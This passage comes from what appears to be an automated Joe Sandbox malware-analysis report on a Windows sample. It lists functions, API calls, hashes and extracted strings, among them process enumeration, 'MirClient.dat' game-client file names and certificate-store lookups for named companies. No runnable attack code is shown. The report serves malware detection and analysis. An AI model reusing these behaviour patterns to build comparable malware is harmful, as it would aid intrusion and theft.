                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (qj
                                                                                  • API String ID: 0-3815605640
                                                                                  • Opcode ID: 4eee9d878fd311126784a62218db2e381659fa71c1221016ecfa2bade86d2b2b
                                                                                  • Instruction ID: 2e21cb4261d91de94344de381fd0d3a15ada0cfb607980f49cddcea7c9f31b25
                                                                                  • Opcode Fuzzy Hash: 4eee9d878fd311126784a62218db2e381659fa71c1221016ecfa2bade86d2b2b
                                                                                  • Instruction Fuzzy Hash: 24519CB5A08705DFC704CF29D480A6AFBE1BF88304F81856EE8598B756DB31F855CB86
                                                                                  Function 0BEB4714 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0BEB3A34: RtlEnterCriticalSection.NTDLL(0C4E1C00), ref: 0BEB3A38
                                                                                  • CreateFontIndirectA.GDI32(?), ref: 0BEB4852
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateCriticalEnterFontIndirectSection
                                                                                  • String ID: MS Sans Serif$Default
                                                                                  • API String ID: 2931345757-2137701257
                                                                                  • Opcode ID: 105edd788817563fcbd3fb300845dd2bbd06086720aef2cd4f7d8f74d6d981d2
                                                                                  • Instruction ID: e8f0a59671a40c80fae08309f8953901989574ac193d6229334b477ebdec3613
                                                                                  • Opcode Fuzzy Hash: 105edd788817563fcbd3fb300845dd2bbd06086720aef2cd4f7d8f74d6d981d2
                                                                                  • Instruction Fuzzy Hash: 1A516930A04288DFDB11CFA8D581FCEBBF6AF49304F5590A5E800A7392D374AE05CB65
                                                                                  Function 6A6FC2CD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __fdopen
                                                                                  • String ID: +$t
                                                                                  • API String ID: 194168367-1842947216
                                                                                  • Opcode ID: 29c0d434a8e882d606fe72b063e342811e5b529edb6c94013501cb31ce4def1e
                                                                                  • Instruction ID: 575d0d7edeb4dd19d357cb48723ecc548ca9fd37f37d5a20da10b8fb8eaf1c48
                                                                                  • Opcode Fuzzy Hash: 29c0d434a8e882d606fe72b063e342811e5b529edb6c94013501cb31ce4def1e
                                                                                  • Instruction Fuzzy Hash: F721F632508740AEE7108A78D448B9B77DADF45398F258D29EC6BC61D2DF75F486C250
                                                                                  Function 6A6E1820 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID: .sys$\SystemRoot\
                                                                                  • API String ID: 2102423945-3490909580
                                                                                  • Opcode ID: 52dfcb9764befe47a90401e52f71e1fc24040d6a6bd3399f8fef032f9e8fcb25
                                                                                  • Instruction ID: 7293ec3cd097d54d6b2640a5a26ca3c3e154f6063de7a840cc10c3d841e1dd61
                                                                                  • Opcode Fuzzy Hash: 52dfcb9764befe47a90401e52f71e1fc24040d6a6bd3399f8fef032f9e8fcb25
                                                                                  • Instruction Fuzzy Hash: B321017160D3845FC705CB699854AEBFBE1AF9A304F44883DE8C9C7241EF719848C7A2
                                                                                  Function 0BE9D2AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0BE9D38A), ref: 0BE9D332
                                                                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0BE9D38A), ref: 0BE9D338
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DateFormatLocaleThread
                                                                                  • String ID: yyyy
                                                                                  • API String ID: 3303714858-3145165042
                                                                                  • Opcode ID: a1c4fbca0503098dcf0b3beb5c096f632f5989d00424acb0c28639e6b0f225f2
                                                                                  • Instruction ID: e19de07805c820eccece93e0b4579e1e50fd683f631284a2cc6bdabf1f8fea3d
                                                                                  • Opcode Fuzzy Hash: a1c4fbca0503098dcf0b3beb5c096f632f5989d00424acb0c28639e6b0f225f2
                                                                                  • Instruction Fuzzy Hash: C3219278600618AFDF11EBA8EC92AEE73B8EF09302F5060B5EC14D7350D6349E49C765
                                                                                  Function 6A6DB160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6DB186
                                                                                    • Part of subcall function 6A6DB0A0: _memset.LIBCMT ref: 6A6DB0C8
                                                                                  • _memset.LIBCMT ref: 6A6DB1C1
                                                                                    • Part of subcall function 6A6DB5E0: CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6A6DB648
                                                                                    • Part of subcall function 6A6DB5E0: CryptMsgGetParam.CRYPT32(?,00000006,00000000,00000000,?), ref: 6A6DB66A
                                                                                    • Part of subcall function 6A6DB5E0: LocalAlloc.KERNEL32(00000040,?), ref: 6A6DB67B
                                                                                    • Part of subcall function 6A6DB5E0: CryptMsgGetParam.CRYPT32(?,00000006,00000000,00000000,?), ref: 6A6DB695
                                                                                    • Part of subcall function 6A6DB5E0: _printf.LIBCMT ref: 6A6DB6AC
                                                                                    • Part of subcall function 6A6DB5E0: CertFindCertificateInStore.CRYPT32(?,00010001,00000000,000B0000,?,00000000), ref: 6A6DB6E6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Crypt_memset$Param$AllocCertCertificateFindLocalObjectQueryStore_printf
                                                                                  • String ID: Chongqing Intelligent Information Tech Co.,Ltd.
                                                                                  • API String ID: 542608461-828530063
                                                                                  • Opcode ID: bf6432e6bcea6478ab9c1a3bfb83d9deb52bc435c8b8f19deb088dca37bd0d1f
                                                                                  • Instruction ID: 034a9a45db56adec3729b9c04f68ada9e689c2030a890e3f8984db9f52e61aef
                                                                                  • Opcode Fuzzy Hash: bf6432e6bcea6478ab9c1a3bfb83d9deb52bc435c8b8f19deb088dca37bd0d1f
                                                                                  • Instruction Fuzzy Hash: 7C2124715083489BE325DB64DC8ABEB77E99F88348F44492CE588C7246FF71920882E2
                                                                                  Function 6A6D7F20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D7F46
                                                                                    • Part of subcall function 6A6E0470: GetModuleHandleA.KERNEL32 ref: 6A6E052A
                                                                                    • Part of subcall function 6A6E0470: GetProcAddress.KERNEL32(00000000), ref: 6A6E0531
                                                                                    • Part of subcall function 6A6DB0A0: _memset.LIBCMT ref: 6A6DB0C8
                                                                                  • _memset.LIBCMT ref: 6A6D7F8A
                                                                                    • Part of subcall function 6A6DB5E0: CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6A6DB648
                                                                                    • Part of subcall function 6A6DB5E0: CryptMsgGetParam.CRYPT32(?,00000006,00000000,00000000,?), ref: 6A6DB66A
                                                                                    • Part of subcall function 6A6DB5E0: LocalAlloc.KERNEL32(00000040,?), ref: 6A6DB67B
                                                                                    • Part of subcall function 6A6DB5E0: CryptMsgGetParam.CRYPT32(?,00000006,00000000,00000000,?), ref: 6A6DB695
                                                                                    • Part of subcall function 6A6DB5E0: _printf.LIBCMT ref: 6A6DB6AC
                                                                                    • Part of subcall function 6A6DB5E0: CertFindCertificateInStore.CRYPT32(?,00010001,00000000,000B0000,?,00000000), ref: 6A6DB6E6
                                                                                  Strings
                                                                                  • Shanghai Huizun Industries Co., Ltd., xrefs: 6A6D7FC4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Crypt_memset$Param$AddressAllocCertCertificateFindHandleLocalModuleObjectProcQueryStore_printf
                                                                                  • String ID: Shanghai Huizun Industries Co., Ltd.
                                                                                  • API String ID: 3606257896-2979844265
                                                                                  • Opcode ID: 8bd7260c1114ee2d17327a0c0a5e84c3ca609ea1a682e1a67e9b4d486a89cbee
                                                                                  • Instruction ID: 2a5e0c389ced069da9d0afcfe6ac739c95552d91701c4b7a330cbf94e45fc417
                                                                                  • Opcode Fuzzy Hash: 8bd7260c1114ee2d17327a0c0a5e84c3ca609ea1a682e1a67e9b4d486a89cbee
                                                                                  • Instruction Fuzzy Hash: 5D1103B15083489BE735DB24DD86BEBB3E85B88748F45482CE54886182FF75A20C86A7
                                                                                  Function 6A6D50B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  • keyname is : %s, buffer is : %s, length is : %d, xrefs: 6A6D50F5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset_sprintf
                                                                                  • String ID: keyname is : %s, buffer is : %s, length is : %d
                                                                                  • API String ID: 1557529856-1723146052
                                                                                  • Opcode ID: 71aa9e05e352f2a4235cfa2414c0ccccbec0908850e9ff9690c058b74f8e7332
                                                                                  • Instruction ID: a682b7dd14dd1c1abcd781cca5e015962bdd7e4d78453e4c52441f112126f4fb
                                                                                  • Opcode Fuzzy Hash: 71aa9e05e352f2a4235cfa2414c0ccccbec0908850e9ff9690c058b74f8e7332
                                                                                  • Instruction Fuzzy Hash: 1601D2711183486BD330D7289C49BEB77DCDFC5308F040929E9489B191EF706A08C2EA
                                                                                  Function 6A6D9CC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D9CE8
                                                                                    • Part of subcall function 6A6E05A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,?), ref: 6A6E05C3
                                                                                    • Part of subcall function 6A6E05A0: _memset.LIBCMT ref: 6A6E05DA
                                                                                    • Part of subcall function 6A6E05A0: Process32First.KERNEL32 ref: 6A6E05F0
                                                                                    • Part of subcall function 6A6E05A0: CloseHandle.KERNEL32(00000000), ref: 6A6E05FA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                  • String ID: 91Client.dat$MirClient.dat
                                                                                  • API String ID: 113637525-146612288
                                                                                  • Opcode ID: 204b78eb2f26d61f84716c0205feb6a89209527b6855c603812e9baf0b3178f5
                                                                                  • Instruction ID: 70eb74bfa6ca0962755d01c82cbe029b36c6ad35450308cdc3d4b4baffd379bc
                                                                                  • Opcode Fuzzy Hash: 204b78eb2f26d61f84716c0205feb6a89209527b6855c603812e9baf0b3178f5
                                                                                  • Instruction Fuzzy Hash: D401F7B29082101BE650E7649D45BDB7BF99B5574DF050839ED4882142FF21EA0C82F2
                                                                                  Function 0BEB23F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSystemMetrics.USER32(00000000), ref: 0BEB2445
                                                                                  • GetSystemMetrics.USER32(00000001), ref: 0BEB2451
                                                                                    • Part of subcall function 0BEB2284: GetProcAddress.KERNEL32(75A50000,00000000), ref: 0BEB2304
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MetricsSystem$AddressProc
                                                                                  • String ID: MonitorFromRect
                                                                                  • API String ID: 1792783759-4033241945
